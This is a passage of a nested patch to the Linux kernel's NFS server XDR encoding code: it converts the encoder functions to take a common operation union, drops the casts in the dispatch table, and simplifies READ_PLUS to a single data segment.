++	struct nfsd4_open *open = &u->open;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -3915,16 +3998,20 @@ nfsd4_encode_open(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_op
+ }
+ 
+ static __be32
+-nfsd4_encode_open_confirm(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_open_confirm *oc)
++nfsd4_encode_open_confirm(struct nfsd4_compoundres *resp, __be32 nfserr,
++			  union nfsd4_op_u *u)
+ {
++	struct nfsd4_open_confirm *oc = &u->open_confirm;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+ 	return nfsd4_encode_stateid(xdr, &oc->oc_resp_stateid);
+ }
+ 
+ static __be32
+-nfsd4_encode_open_downgrade(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_open_downgrade *od)
++nfsd4_encode_open_downgrade(struct nfsd4_compoundres *resp, __be32 nfserr,
++			    union nfsd4_op_u *u)
+ {
++	struct nfsd4_open_downgrade *od = &u->open_downgrade;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+ 	return nfsd4_encode_stateid(xdr, &od->od_stateid);
+@@ -4023,8 +4110,9 @@ static __be32 nfsd4_encode_readv(struct nfsd4_compoundres *resp,
+ 
+ static __be32
+ nfsd4_encode_read(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		  struct nfsd4_read *read)
++		  union nfsd4_op_u *u)
+ {
++	struct nfsd4_read *read = &u->read;
+ 	bool splice_ok = test_bit(RQ_SPLICE_OK, &resp->rqstp->rq_flags);
+ 	unsigned long maxcount;
+ 	struct xdr_stream *xdr = resp->xdr;
+@@ -4065,8 +4153,10 @@ nfsd4_encode_read(struct nfsd4_compoundres *resp, __be32 nfserr,
+ }
+ 
+ static __be32
+-nfsd4_encode_readlink(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_readlink *readlink)
++nfsd4_encode_readlink(struct nfsd4_compoundres *resp, __be32 nfserr,
++		      union nfsd4_op_u *u)
+ {
++	struct nfsd4_readlink *readlink = &u->readlink;
+ 	__be32 *p, *maxcount_p, zero = xdr_zero;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	int length_offset = xdr->buf->len;
+@@ -4110,8 +4200,10 @@ nfsd4_encode_readlink(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd
+ }
+ 
+ static __be32
+-nfsd4_encode_readdir(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_readdir *readdir)
++nfsd4_encode_readdir(struct nfsd4_compoundres *resp, __be32 nfserr,
++		     union nfsd4_op_u *u)
+ {
++	struct nfsd4_readdir *readdir = &u->readdir;
+ 	int maxcount;
+ 	int bytes_left;
+ 	loff_t offset;
+@@ -4201,8 +4293,10 @@ nfsd4_encode_readdir(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4
+ }
+ 
+ static __be32
+-nfsd4_encode_remove(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_remove *remove)
++nfsd4_encode_remove(struct nfsd4_compoundres *resp, __be32 nfserr,
++		    union nfsd4_op_u *u)
+ {
++	struct nfsd4_remove *remove = &u->remove;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4214,8 +4308,10 @@ nfsd4_encode_remove(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_
+ }
+ 
+ static __be32
+-nfsd4_encode_rename(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_rename *rename)
++nfsd4_encode_rename(struct nfsd4_compoundres *resp, __be32 nfserr,
++		    union nfsd4_op_u *u)
+ {
++	struct nfsd4_rename *rename = &u->rename;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4297,8 +4393,9 @@ nfsd4_do_encode_secinfo(struct xdr_stream *xdr, struct svc_export *exp)
+ 
+ static __be32
+ nfsd4_encode_secinfo(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		     struct nfsd4_secinfo *secinfo)
++		     union nfsd4_op_u *u)
+ {
++	struct nfsd4_secinfo *secinfo = &u->secinfo;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+ 	return nfsd4_do_encode_secinfo(xdr, secinfo->si_exp);
+@@ -4306,8 +4403,9 @@ nfsd4_encode_secinfo(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_secinfo_no_name(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		     struct nfsd4_secinfo_no_name *secinfo)
++		     union nfsd4_op_u *u)
+ {
++	struct nfsd4_secinfo_no_name *secinfo = &u->secinfo_no_name;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+ 	return nfsd4_do_encode_secinfo(xdr, secinfo->sin_exp);
+@@ -4318,8 +4416,10 @@ nfsd4_encode_secinfo_no_name(struct nfsd4_compoundres *resp, __be32 nfserr,
+  * regardless of the error status.
+  */
+ static __be32
+-nfsd4_encode_setattr(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_setattr *setattr)
++nfsd4_encode_setattr(struct nfsd4_compoundres *resp, __be32 nfserr,
++		     union nfsd4_op_u *u)
+ {
++	struct nfsd4_setattr *setattr = &u->setattr;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4342,8 +4442,10 @@ nfsd4_encode_setattr(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4
+ }
+ 
+ static __be32
+-nfsd4_encode_setclientid(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_setclientid *scd)
++nfsd4_encode_setclientid(struct nfsd4_compoundres *resp, __be32 nfserr,
++			 union nfsd4_op_u *u)
+ {
++	struct nfsd4_setclientid *scd = &u->setclientid;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4366,8 +4468,10 @@ nfsd4_encode_setclientid(struct nfsd4_compoundres *resp, __be32 nfserr, struct n
+ }
+ 
+ static __be32
+-nfsd4_encode_write(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_write *write)
++nfsd4_encode_write(struct nfsd4_compoundres *resp, __be32 nfserr,
++		   union nfsd4_op_u *u)
+ {
++	struct nfsd4_write *write = &u->write;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4383,8 +4487,9 @@ nfsd4_encode_write(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_w
+ 
+ static __be32
+ nfsd4_encode_exchange_id(struct nfsd4_compoundres *resp, __be32 nfserr,
+-			 struct nfsd4_exchange_id *exid)
++			 union nfsd4_op_u *u)
+ {
++	struct nfsd4_exchange_id *exid = &u->exchange_id;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 	char *major_id;
+@@ -4461,8 +4566,9 @@ nfsd4_encode_exchange_id(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_create_session(struct nfsd4_compoundres *resp, __be32 nfserr,
+-			    struct nfsd4_create_session *sess)
++			    union nfsd4_op_u *u)
+ {
++	struct nfsd4_create_session *sess = &u->create_session;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4514,8 +4620,9 @@ nfsd4_encode_create_session(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_sequence(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		      struct nfsd4_sequence *seq)
++		      union nfsd4_op_u *u)
+ {
++	struct nfsd4_sequence *seq = &u->sequence;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4537,8 +4644,9 @@ nfsd4_encode_sequence(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_test_stateid(struct nfsd4_compoundres *resp, __be32 nfserr,
+-			  struct nfsd4_test_stateid *test_stateid)
++			  union nfsd4_op_u *u)
+ {
++	struct nfsd4_test_stateid *test_stateid = &u->test_stateid;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	struct nfsd4_test_stateid_id *stateid, *next;
+ 	__be32 *p;
+@@ -4558,8 +4666,9 @@ nfsd4_encode_test_stateid(struct nfsd4_compoundres *resp, __be32 nfserr,
+ #ifdef CONFIG_NFSD_PNFS
+ static __be32
+ nfsd4_encode_getdeviceinfo(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		struct nfsd4_getdeviceinfo *gdev)
++		union nfsd4_op_u *u)
+ {
++	struct nfsd4_getdeviceinfo *gdev = &u->getdeviceinfo;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	const struct nfsd4_layout_ops *ops;
+ 	u32 starting_len = xdr->buf->len, needed_len;
+@@ -4611,8 +4720,9 @@ nfsd4_encode_getdeviceinfo(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_layoutget(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		struct nfsd4_layoutget *lgp)
++		union nfsd4_op_u *u)
+ {
++	struct nfsd4_layoutget *lgp = &u->layoutget;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	const struct nfsd4_layout_ops *ops;
+ 	__be32 *p;
+@@ -4638,8 +4748,9 @@ nfsd4_encode_layoutget(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_layoutcommit(struct nfsd4_compoundres *resp, __be32 nfserr,
+-			  struct nfsd4_layoutcommit *lcp)
++			  union nfsd4_op_u *u)
+ {
++	struct nfsd4_layoutcommit *lcp = &u->layoutcommit;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4659,8 +4770,9 @@ nfsd4_encode_layoutcommit(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_layoutreturn(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		struct nfsd4_layoutreturn *lrp)
++		union nfsd4_op_u *u)
+ {
++	struct nfsd4_layoutreturn *lrp = &u->layoutreturn;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4745,8 +4857,9 @@ nfsd42_encode_nl4_server(struct nfsd4_compoundres *resp, struct nl4_server *ns)
+ 
+ static __be32
+ nfsd4_encode_copy(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		  struct nfsd4_copy *copy)
++		  union nfsd4_op_u *u)
+ {
++	struct nfsd4_copy *copy = &u->copy;
+ 	__be32 *p;
+ 
+ 	nfserr = nfsd42_encode_write_res(resp, &copy->cp_res,
+@@ -4762,8 +4875,9 @@ nfsd4_encode_copy(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_offload_status(struct nfsd4_compoundres *resp, __be32 nfserr,
+-			    struct nfsd4_offload_status *os)
++			    union nfsd4_op_u *u)
+ {
++	struct nfsd4_offload_status *os = &u->offload_status;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4777,156 +4891,83 @@ nfsd4_encode_offload_status(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_read_plus_data(struct nfsd4_compoundres *resp,
+-			    struct nfsd4_read *read,
+-			    unsigned long *maxcount, u32 *eof,
+-			    loff_t *pos)
++			    struct nfsd4_read *read)
+ {
+-	struct xdr_stream *xdr = resp->xdr;
++	bool splice_ok = test_bit(RQ_SPLICE_OK, &resp->rqstp->rq_flags);
+ 	struct file *file = read->rd_nf->nf_file;
+-	int starting_len = xdr->buf->len;
+-	loff_t hole_pos;
+-	__be32 nfserr;
+-	__be32 *p, tmp;
+-	__be64 tmp64;
+-
+-	hole_pos = pos ? *pos : vfs_llseek(file, read->rd_offset, SEEK_HOLE);
+-	if (hole_pos > read->rd_offset)
+-		*maxcount = min_t(unsigned long, *maxcount, hole_pos - read->rd_offset);
+-	*maxcount = min_t(unsigned long, *maxcount, (xdr->buf->buflen - xdr->buf->len));
++	struct xdr_stream *xdr = resp->xdr;
++	unsigned long maxcount;
++	__be32 nfserr, *p;
+ 
+ 	/* Content type, offset, byte count */
+ 	p = xdr_reserve_space(xdr, 4 + 8 + 4);
+ 	if (!p)
+-		return nfserr_resource;
++		return nfserr_io;
++	if (resp->xdr->buf->page_len && splice_ok) {
++		WARN_ON_ONCE(splice_ok);
++		return nfserr_serverfault;
++	}
+ 
+-	read->rd_vlen = xdr_reserve_space_vec(xdr, resp->rqstp->rq_vec, *maxcount);
+-	if (read->rd_vlen < 0)
+-		return nfserr_resource;
++	maxcount = min_t(unsigned long, read->rd_length,
++			 (xdr->buf->buflen - xdr->buf->len));
+ 
+-	nfserr = nfsd_readv(resp->rqstp, read->rd_fhp, file, read->rd_offset,
+-			    resp->rqstp->rq_vec, read->rd_vlen, maxcount, eof);
++	if (file->f_op->splice_read && splice_ok)
++		nfserr = nfsd4_encode_splice_read(resp, read, file, maxcount);
++	else
++		nfserr = nfsd4_encode_readv(resp, read, file, maxcount);
+ 	if (nfserr)
+ 		return nfserr;
+-	xdr_truncate_encode(xdr, starting_len + 16 + xdr_align_size(*maxcount));
+-
+-	tmp = htonl(NFS4_CONTENT_DATA);
+-	write_bytes_to_xdr_buf(xdr->buf, starting_len,      &tmp,   4);
+-	tmp64 = cpu_to_be64(read->rd_offset);
+-	write_bytes_to_xdr_buf(xdr->buf, starting_len + 4,  &tmp64, 8);
+-	tmp = htonl(*maxcount);
+-	write_bytes_to_xdr_buf(xdr->buf, starting_len + 12, &tmp,   4);
+-
+-	tmp = xdr_zero;
+-	write_bytes_to_xdr_buf(xdr->buf, starting_len + 16 + *maxcount, &tmp,
+-			       xdr_pad_size(*maxcount));
+-	return nfs_ok;
+-}
+-
+-static __be32
+-nfsd4_encode_read_plus_hole(struct nfsd4_compoundres *resp,
+-			    struct nfsd4_read *read,
+-			    unsigned long *maxcount, u32 *eof)
+-{
+-	struct file *file = read->rd_nf->nf_file;
+-	loff_t data_pos = vfs_llseek(file, read->rd_offset, SEEK_DATA);
+-	loff_t f_size = i_size_read(file_inode(file));
+-	unsigned long count;
+-	__be32 *p;
+-
+-	if (data_pos == -ENXIO)
+-		data_pos = f_size;
+-	else if (data_pos <= read->rd_offset || (data_pos < f_size && data_pos % PAGE_SIZE))
+-		return nfsd4_encode_read_plus_data(resp, read, maxcount, eof, &f_size);
+-	count = data_pos - read->rd_offset;
+ 
+-	/* Content type, offset, byte count */
+-	p = xdr_reserve_space(resp->xdr, 4 + 8 + 8);
+-	if (!p)
+-		return nfserr_resource;
+-
+-	*p++ = htonl(NFS4_CONTENT_HOLE);
++	*p++ = cpu_to_be32(NFS4_CONTENT_DATA);
+ 	p = xdr_encode_hyper(p, read->rd_offset);
+-	p = xdr_encode_hyper(p, count);
++	*p = cpu_to_be32(read->rd_length);
+ 
+-	*eof = (read->rd_offset + count) >= f_size;
+-	*maxcount = min_t(unsigned long, count, *maxcount);
+ 	return nfs_ok;
+ }
+ 
+ static __be32
+ nfsd4_encode_read_plus(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		       struct nfsd4_read *read)
++		       union nfsd4_op_u *u)
+ {
+-	unsigned long maxcount, count;
++	struct nfsd4_read *read = &u->read;
++	struct file *file = read->rd_nf->nf_file;
+ 	struct xdr_stream *xdr = resp->xdr;
+-	struct file *file;
+ 	int starting_len = xdr->buf->len;
+-	int last_segment = xdr->buf->len;
+-	int segments = 0;
+-	__be32 *p, tmp;
+-	bool is_data;
+-	loff_t pos;
+-	u32 eof;
++	u32 segments = 0;
++	__be32 *p;
+ 
+ 	if (nfserr)
+ 		return nfserr;
+-	file = read->rd_nf->nf_file;
+ 
+ 	/* eof flag, segment count */
+ 	p = xdr_reserve_space(xdr, 4 + 4);
+ 	if (!p)
+-		return nfserr_resource;
++		return nfserr_io;
+ 	xdr_commit_encode(xdr);
+ 
+-	maxcount = min_t(unsigned long, read->rd_length,
+-			 (xdr->buf->buflen - xdr->buf->len));
+-	count    = maxcount;
+-
+-	eof = read->rd_offset >= i_size_read(file_inode(file));
+-	if (eof)
++	read->rd_eof = read->rd_offset >= i_size_read(file_inode(file));
++	if (read->rd_eof)
+ 		goto out;
+ 
+-	pos = vfs_llseek(file, read->rd_offset, SEEK_HOLE);
+-	is_data = pos > read->rd_offset;
+-
+-	while (count > 0 && !eof) {
+-		maxcount = count;
+-		if (is_data)
+-			nfserr = nfsd4_encode_read_plus_data(resp, read, &maxcount, &eof,
+-						segments == 0 ? &pos : NULL);
+-		else
+-			nfserr = nfsd4_encode_read_plus_hole(resp, read, &maxcount, &eof);
+-		if (nfserr)
+-			goto out;
+-		count -= maxcount;
+-		read->rd_offset += maxcount;
+-		is_data = !is_data;
+-		last_segment = xdr->buf->len;
+-		segments++;
+-	}
+-
+-out:
+-	if (nfserr && segments == 0)
++	nfserr = nfsd4_encode_read_plus_data(resp, read);
++	if (nfserr) {
+ 		xdr_truncate_encode(xdr, starting_len);
+-	else {
+-		if (nfserr) {
+-			xdr_truncate_encode(xdr, last_segment);
+-			nfserr = nfs_ok;
+-			eof = 0;
+-		}
+-		tmp = htonl(eof);
+-		write_bytes_to_xdr_buf(xdr->buf, starting_len,     &tmp, 4);
+-		tmp = htonl(segments);
+-		write_bytes_to_xdr_buf(xdr->buf, starting_len + 4, &tmp, 4);
++		return nfserr;
+ 	}
+ 
++	segments++;
++
++out:
++	p = xdr_encode_bool(p, read->rd_eof);
++	*p = cpu_to_be32(segments);
+ 	return nfserr;
+ }
+ 
+ static __be32
+ nfsd4_encode_copy_notify(struct nfsd4_compoundres *resp, __be32 nfserr,
+-			 struct nfsd4_copy_notify *cn)
++			 union nfsd4_op_u *u)
+ {
++	struct nfsd4_copy_notify *cn = &u->copy_notify;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4960,8 +5001,9 @@ nfsd4_encode_copy_notify(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_seek(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		  struct nfsd4_seek *seek)
++		  union nfsd4_op_u *u)
+ {
++	struct nfsd4_seek *seek = &u->seek;
+ 	__be32 *p;
+ 
+ 	p = xdr_reserve_space(resp->xdr, 4 + 8);
+@@ -4972,7 +5014,8 @@ nfsd4_encode_seek(struct nfsd4_compoundres *resp, __be32 nfserr,
+ }
+ 
+ static __be32
+-nfsd4_encode_noop(struct nfsd4_compoundres *resp, __be32 nfserr, void *p)
++nfsd4_encode_noop(struct nfsd4_compoundres *resp, __be32 nfserr,
++		  union nfsd4_op_u *p)
+ {
+ 	return nfserr;
+ }
+@@ -5023,8 +5066,9 @@ nfsd4_vbuf_to_stream(struct xdr_stream *xdr, char *buf, u32 buflen)
+ 
+ static __be32
+ nfsd4_encode_getxattr(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		      struct nfsd4_getxattr *getxattr)
++		      union nfsd4_op_u *u)
+ {
++	struct nfsd4_getxattr *getxattr = &u->getxattr;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p, err;
+ 
+@@ -5047,8 +5091,9 @@ nfsd4_encode_getxattr(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_setxattr(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		      struct nfsd4_setxattr *setxattr)
++		      union nfsd4_op_u *u)
+ {
++	struct nfsd4_setxattr *setxattr = &u->setxattr;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -5088,8 +5133,9 @@ nfsd4_listxattr_validate_cookie(struct nfsd4_listxattrs *listxattrs,
+ 
+ static __be32
+ nfsd4_encode_listxattrs(struct nfsd4_compoundres *resp, __be32 nfserr,
+-			struct nfsd4_listxattrs *listxattrs)
++			union nfsd4_op_u *u)
+ {
++	struct nfsd4_listxattrs *listxattrs = &u->listxattrs;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	u32 cookie_offset, count_offset, eof;
+ 	u32 left, xdrleft, slen, count;
+@@ -5199,8 +5245,9 @@ nfsd4_encode_listxattrs(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_removexattr(struct nfsd4_compoundres *resp, __be32 nfserr,
+-			 struct nfsd4_removexattr *removexattr)
++			 union nfsd4_op_u *u)
+ {
++	struct nfsd4_removexattr *removexattr = &u->removexattr;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -5212,7 +5259,7 @@ nfsd4_encode_removexattr(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 	return 0;
+ }
+ 
+-typedef __be32(* nfsd4_enc)(struct nfsd4_compoundres *, __be32, void *);
++typedef __be32(*nfsd4_enc)(struct nfsd4_compoundres *, __be32, union nfsd4_op_u *u);
+ 
+ /*
+  * Note: nfsd4_enc_ops vector is shared for v4.0 and v4.1
+@@ -5220,93 +5267,93 @@ typedef __be32(* nfsd4_enc)(struct nfsd4_compoundres *, __be32, void *);
+  * done in the decoding phase.
+  */
+ static const nfsd4_enc nfsd4_enc_ops[] = {
+-	[OP_ACCESS]		= (nfsd4_enc)nfsd4_encode_access,
+-	[OP_CLOSE]		= (nfsd4_enc)nfsd4_encode_close,
+-	[OP_COMMIT]		= (nfsd4_enc)nfsd4_encode_commit,
+-	[OP_CREATE]		= (nfsd4_enc)nfsd4_encode_create,
+-	[OP_DELEGPURGE]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_DELEGRETURN]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_GETATTR]		= (nfsd4_enc)nfsd4_encode_getattr,
+-	[OP_GETFH]		= (nfsd4_enc)nfsd4_encode_getfh,
+-	[OP_LINK]		= (nfsd4_enc)nfsd4_encode_link,
+-	[OP_LOCK]		= (nfsd4_enc)nfsd4_encode_lock,
+-	[OP_LOCKT]		= (nfsd4_enc)nfsd4_encode_lockt,
+-	[OP_LOCKU]		= (nfsd4_enc)nfsd4_encode_locku,
+-	[OP_LOOKUP]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_LOOKUPP]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_NVERIFY]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_OPEN]		= (nfsd4_enc)nfsd4_encode_open,
+-	[OP_OPENATTR]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_OPEN_CONFIRM]	= (nfsd4_enc)nfsd4_encode_open_confirm,
+-	[OP_OPEN_DOWNGRADE]	= (nfsd4_enc)nfsd4_encode_open_downgrade,
+-	[OP_PUTFH]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_PUTPUBFH]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_PUTROOTFH]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_READ]		= (nfsd4_enc)nfsd4_encode_read,
+-	[OP_READDIR]		= (nfsd4_enc)nfsd4_encode_readdir,
+-	[OP_READLINK]		= (nfsd4_enc)nfsd4_encode_readlink,
+-	[OP_REMOVE]		= (nfsd4_enc)nfsd4_encode_remove,
+-	[OP_RENAME]		= (nfsd4_enc)nfsd4_encode_rename,
+-	[OP_RENEW]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_RESTOREFH]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_SAVEFH]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_SECINFO]		= (nfsd4_enc)nfsd4_encode_secinfo,
+-	[OP_SETATTR]		= (nfsd4_enc)nfsd4_encode_setattr,
+-	[OP_SETCLIENTID]	= (nfsd4_enc)nfsd4_encode_setclientid,
+-	[OP_SETCLIENTID_CONFIRM] = (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_VERIFY]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_WRITE]		= (nfsd4_enc)nfsd4_encode_write,
+-	[OP_RELEASE_LOCKOWNER]	= (nfsd4_enc)nfsd4_encode_noop,
++	[OP_ACCESS]		= nfsd4_encode_access,
++	[OP_CLOSE]		= nfsd4_encode_close,
++	[OP_COMMIT]		= nfsd4_encode_commit,
++	[OP_CREATE]		= nfsd4_encode_create,
++	[OP_DELEGPURGE]		= nfsd4_encode_noop,
++	[OP_DELEGRETURN]	= nfsd4_encode_noop,
++	[OP_GETATTR]		= nfsd4_encode_getattr,
++	[OP_GETFH]		= nfsd4_encode_getfh,
++	[OP_LINK]		= nfsd4_encode_link,
++	[OP_LOCK]		= nfsd4_encode_lock,
++	[OP_LOCKT]		= nfsd4_encode_lockt,
++	[OP_LOCKU]		= nfsd4_encode_locku,
++	[OP_LOOKUP]		= nfsd4_encode_noop,
++	[OP_LOOKUPP]		= nfsd4_encode_noop,
++	[OP_NVERIFY]		= nfsd4_encode_noop,
++	[OP_OPEN]		= nfsd4_encode_open,
++	[OP_OPENATTR]		= nfsd4_encode_noop,
++	[OP_OPEN_CONFIRM]	= nfsd4_encode_open_confirm,
++	[OP_OPEN_DOWNGRADE]	= nfsd4_encode_open_downgrade,
++	[OP_PUTFH]		= nfsd4_encode_noop,
++	[OP_PUTPUBFH]		= nfsd4_encode_noop,
++	[OP_PUTROOTFH]		= nfsd4_encode_noop,
++	[OP_READ]		= nfsd4_encode_read,
++	[OP_READDIR]		= nfsd4_encode_readdir,
++	[OP_READLINK]		= nfsd4_encode_readlink,
++	[OP_REMOVE]		= nfsd4_encode_remove,
++	[OP_RENAME]		= nfsd4_encode_rename,
++	[OP_RENEW]		= nfsd4_encode_noop,
++	[OP_RESTOREFH]		= nfsd4_encode_noop,
++	[OP_SAVEFH]		= nfsd4_encode_noop,
++	[OP_SECINFO]		= nfsd4_encode_secinfo,
++	[OP_SETATTR]		= nfsd4_encode_setattr,
++	[OP_SETCLIENTID]	= nfsd4_encode_setclientid,
++	[OP_SETCLIENTID_CONFIRM] = nfsd4_encode_noop,
++	[OP_VERIFY]		= nfsd4_encode_noop,
++	[OP_WRITE]		= nfsd4_encode_write,
++	[OP_RELEASE_LOCKOWNER]	= nfsd4_encode_noop,
+ 
+ 	/* NFSv4.1 operations */
+-	[OP_BACKCHANNEL_CTL]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_BIND_CONN_TO_SESSION] = (nfsd4_enc)nfsd4_encode_bind_conn_to_session,
+-	[OP_EXCHANGE_ID]	= (nfsd4_enc)nfsd4_encode_exchange_id,
+-	[OP_CREATE_SESSION]	= (nfsd4_enc)nfsd4_encode_create_session,
+-	[OP_DESTROY_SESSION]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_FREE_STATEID]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_GET_DIR_DELEGATION]	= (nfsd4_enc)nfsd4_encode_noop,
++	[OP_BACKCHANNEL_CTL]	= nfsd4_encode_noop,
++	[OP_BIND_CONN_TO_SESSION] = nfsd4_encode_bind_conn_to_session,
++	[OP_EXCHANGE_ID]	= nfsd4_encode_exchange_id,
++	[OP_CREATE_SESSION]	= nfsd4_encode_create_session,
++	[OP_DESTROY_SESSION]	= nfsd4_encode_noop,
++	[OP_FREE_STATEID]	= nfsd4_encode_noop,
++	[OP_GET_DIR_DELEGATION]	= nfsd4_encode_noop,
+ #ifdef CONFIG_NFSD_PNFS
+-	[OP_GETDEVICEINFO]	= (nfsd4_enc)nfsd4_encode_getdeviceinfo,
+-	[OP_GETDEVICELIST]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_LAYOUTCOMMIT]	= (nfsd4_enc)nfsd4_encode_layoutcommit,
+-	[OP_LAYOUTGET]		= (nfsd4_enc)nfsd4_encode_layoutget,
+-	[OP_LAYOUTRETURN]	= (nfsd4_enc)nfsd4_encode_layoutreturn,
++	[OP_GETDEVICEINFO]	= nfsd4_encode_getdeviceinfo,
++	[OP_GETDEVICELIST]	= nfsd4_encode_noop,
++	[OP_LAYOUTCOMMIT]	= nfsd4_encode_layoutcommit,
++	[OP_LAYOUTGET]		= nfsd4_encode_layoutget,
++	[OP_LAYOUTRETURN]	= nfsd4_encode_layoutreturn,
+ #else
+-	[OP_GETDEVICEINFO]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_GETDEVICELIST]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_LAYOUTCOMMIT]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_LAYOUTGET]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_LAYOUTRETURN]	= (nfsd4_enc)nfsd4_encode_noop,
++	[OP_GETDEVICEINFO]	= nfsd4_encode_noop,
++	[OP_GETDEVICELIST]	= nfsd4_encode_noop,
++	[OP_LAYOUTCOMMIT]	= nfsd4_encode_noop,
++	[OP_LAYOUTGET]		= nfsd4_encode_noop,
++	[OP_LAYOUTRETURN]	= nfsd4_encode_noop,
+ #endif
+-	[OP_SECINFO_NO_NAME]	= (nfsd4_enc)nfsd4_encode_secinfo_no_name,
+-	[OP_SEQUENCE]		= (nfsd4_enc)nfsd4_encode_sequence,
+-	[OP_SET_SSV]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_TEST_STATEID]	= (nfsd4_enc)nfsd4_encode_test_stateid,
+-	[OP_WANT_DELEGATION]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_DESTROY_CLIENTID]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_RECLAIM_COMPLETE]	= (nfsd4_enc)nfsd4_encode_noop,
++	[OP_SECINFO_NO_NAME]	= nfsd4_encode_secinfo_no_name,
++	[OP_SEQUENCE]		= nfsd4_encode_sequence,
